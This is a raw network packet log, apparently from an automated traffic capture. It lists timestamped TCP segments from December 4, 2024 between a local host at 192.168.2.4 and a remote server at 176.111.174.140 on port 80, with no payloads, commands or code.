                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.274738073 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.275732040 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.275775909 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.275871992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.275954008 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.276833057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.276956081 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.277049065 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.277950048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.278121948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.278201103 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.279136896 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.279244900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.279397964 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.280169964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.280337095 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.280498028 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.281418085 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.281543016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.281687021 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.282418013 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.282527924 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.282605886 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.283510923 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.283680916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.283756971 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.284869909 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.284991980 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.285825968 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.285871983 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.419368982 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.419403076 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.419523954 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.419621944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.419756889 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.420655966 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.420779943 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.420909882 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.421224117 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.421900034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.422030926 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.422075033 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.423038960 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.423207045 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.424113989 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.424163103 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.424170971 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.424293995 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.425224066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.425317049 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.425431967 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.426400900 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.426589012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.426675081 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.427539110 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.427628040 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.427867889 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.428567886 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.428700924 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.428740978 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.429733992 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.429862022 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.429903984 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.430830002 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.430951118 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.431030989 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.431927919 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.432156086 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.432240009 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.433049917 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.433193922 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.433279037 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.434317112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.434384108 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.434461117 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.435301065 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.435412884 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.435498953 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.436455965 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.436764956 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.436845064 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.437608957 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.437757015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.438294888 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.438769102 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.438839912 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.438952923 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.439821959 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.439985037 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.440083981 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.440912008 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.441061020 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.441143036 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.442039967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.442172050 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.442256927 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.443231106 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.443305016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.443382025 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.444262981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.444720984 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.444809914 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.445555925 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.445702076 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.445869923 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.446614981 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.446716070 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.446818113 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.447887897 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.447983027 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.448021889 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.449001074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.449074984 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.449162960 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.450011015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.450023890 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.450124025 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.450963974 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.451096058 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.451173067 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.452147007 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.452399015 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.452477932 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.453228951 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.453288078 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.453371048 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.454370022 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.454514980 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.454591990 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.455456972 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.455552101 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.455661058 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.456581116 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.456630945 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.456877947 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.457685947 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.457802057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.457870960 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.458842993 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.459053040 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.459131002 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.460097075 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.460230112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.460310936 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.461152077 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.461205006 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.461287022 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.462317944 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.462472916 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.462570906 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.463339090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.463574886 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.463649035 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.464401007 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.464544058 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.464667082 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.465523958 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.465662956 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.465928078 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.466649055 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.466737986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.466818094 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.467869997 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.467964888 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.468121052 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.468943119 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.469010115 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.469089985 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.470017910 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.470055103 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.470135927 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.471178055 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.471347094 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.471556902 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.472271919 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.472425938 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.472503901 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.473351955 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.473467112 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.473822117 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.474473000 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.474692106 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.474839926 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.475615978 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.475656986 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.475739002 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.476732016 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.476916075 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.476959944 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.477828026 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.536495924 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.612323999 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.612850904 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.612863064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.612935066 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.613176107 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.613262892 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.613914967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.614057064 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.614675045 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.615108967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.615220070 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.615304947 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.616350889 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.616441011 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.616527081 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.617330074 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.617398977 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.617489100 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.618680954 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.618839025 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.618923903 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.619923115 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.620054960 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.620242119 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.620851040 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.620961905 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.621046066 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.621751070 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.621869087 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.622071981 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.622936964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.623100042 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.623208046 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.623989105 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.624118090 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.624330997 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.625102043 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.625252962 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.625335932 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.626271963 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.626388073 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.626502991 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.627342939 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.627413034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.628031015 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.628483057 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.628577948 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.628684998 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.629635096 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.629755974 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.629837036 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.630734921 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.630887032 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.630976915 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.631853104 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.632020950 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.632098913 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.633008003 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.633136988 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.633234024 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.634080887 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.634231091 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.634329081 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.635241985 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.635323048 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.636110067 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.636296034 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.636420012 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.636493921 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.637475967 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.637654066 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.638022900 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.638561964 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.638674974 CET8049738176.111.174.140192.168.2.4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.638752937 CET4973880192.168.2.4176.111.174.140
                                                                                                                                                                                                                                                  Dec 4, 2024 18:23:36.639684916 CET8049738176.111.174.140192.168.2.4
